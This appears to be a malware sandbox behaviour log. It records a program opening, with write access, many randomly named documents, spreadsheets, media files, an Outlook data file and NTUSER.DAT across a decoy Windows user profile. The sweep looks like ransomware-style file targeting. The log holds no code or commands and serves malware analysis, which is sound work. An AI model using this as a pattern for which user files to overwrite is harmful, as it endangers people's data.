Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\hT-SqtZX\obgiME5jO2.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\hT-SqtZX\tkO6bl.odp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\hT-SqtZX\U9tSiBmpae-S.ppt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\hT-SqtZX\wLIFp9Xlr__Upjp5BWpB.xls	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\l8fJ\p2jEbzbiEY.odp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\l8fJ\YeV-uPfMbHLLcGMe_f.odt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\POzUPkpR60DTM.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\skaVx\4xdI4OMOFBx3cqRfxwA0.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\skaVx\aI-hq-hLGIh9RDS.xls	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\skaVx\EoZDJddZ6evy.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\skaVx\F0LyAv7a.xls	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\frr7vMqqzTzgf.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\GkFwBZ26Jl.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\H2j6tPl2-Uy7a_CTb.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Hy6vDgJFghnTAj77.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\I_5X.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\kDhx0.ods	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\Favorites.vss	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\r0_POyzPZT.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\rsqxo_hm.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\unlt.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\v7CbnDwOOLwRsSR.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\WBCuWSQzDcN3.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\YfljSHP679zr.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yvz8Ck.xls	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\YzRpjUWu6VDm3TLDV.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Downloads\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE Add-on site.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Home.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft Store.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Autos.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Entertainment.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Money.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Sports.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSNBC News.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Get Windows Live.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Mail.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Links\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Links\Desktop.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Links\Downloads.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Links\RecentPlaces.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\-Fn54ZOPOU2DZgY9Xjjc.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\0XQBmq5ckaU.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\8E9H31N.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\b ZEoraAV.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\kJFrd7NImQEQs.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\NBd6m3qs3.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\Qj0Bxz9rAG9Fja0Mk.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\r7FR3hZryb5hq9Ud7NX.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\UrqJ.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\XRQKbLhwuLoes9nMF eV.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\zDJHX2UBtq2jNGLqtNRG.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\6G5yHmu-I-1.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\Au5gZJs3.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\fWq7Sf.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\JfvP6S4i2D.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\nJqpjpjhgkzg.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\nvyg\5Lx3KHr.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\nvyg\pkWtVne.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\nvyg\tEL2.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\nvyg\U0AZd0ivGrf _Re 2c.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\nvyg\X8qNDeYP35alh231JX16.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\CZRVI9TRu5syJMCnyOV.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\Lkq3 EjT.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\M3mvj.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\O5g4jLerSHDy3Pf8Z8r\2qDES9yWeof3.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\O5g4jLerSHDy3Pf8Z8r\GYnW7LZ.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\O5g4jLerSHDy3Pf8Z8r\k7CM6LvXyF9LPZI6yh2.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\O5g4jLerSHDy3Pf8Z8r\nxKQUQU2ESS.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\O5g4jLerSHDy3Pf8Z8r\P-MyT-xFsgCgO.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\O5g4jLerSHDy3Pf8Z8r\U eCzQsa89w8ys.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\O5g4jLerSHDy3Pf8Z8r\wlnli51d9s.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\O5g4jLerSHDy3Pf8Z8r\ya4k9CP4ga90mFZW.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\O5g4jLerSHDy3Pf8Z8r\_Xt1XKuQQyohA.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\_PnpDAir3.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\VmQaguirc.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\w52qqQUsQntD6lz uu_3.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\y1mkaun.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\y1w5ZZtxeCJCqVDGm8rd.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\_ERMKi.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\NTUSER.DAT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\-bVmT_XCtJmzFCE.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\A3o-tRWcczzg.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\gwCCr5SN1.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\KCFGl8AGb.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\8ctUF06 2SC36xX7cR0\4DWhN6RhpgdCQKemK.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\8ctUF06 2SC36xX7cR0\FN7 jccu.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\8ctUF06 2SC36xX7cR0\luqHM\IMEhPArBi5zDx-qN3xQn.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\8ctUF06 2SC36xX7cR0\luqHM\l7-qaXxV0q.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\8ctUF06 2SC36xX7cR0\luqHM\znFXRDcUkqphQAEI4ui.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\cc0AC KvAZVVI8uX.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\EEWWiY3V3RdCY.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\IEv7z27qsVTekHpr.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\ZEsdNS.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\ZVtPiW.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\QaUjhe\7FDM.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\QaUjhe\8q988doXb.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\QaUjhe\B-lTUwZlpVSP7x8c.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\QaUjhe\rGw15KQUy_H3LYwN5\2QiXDoa8V yuTWH7Q.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
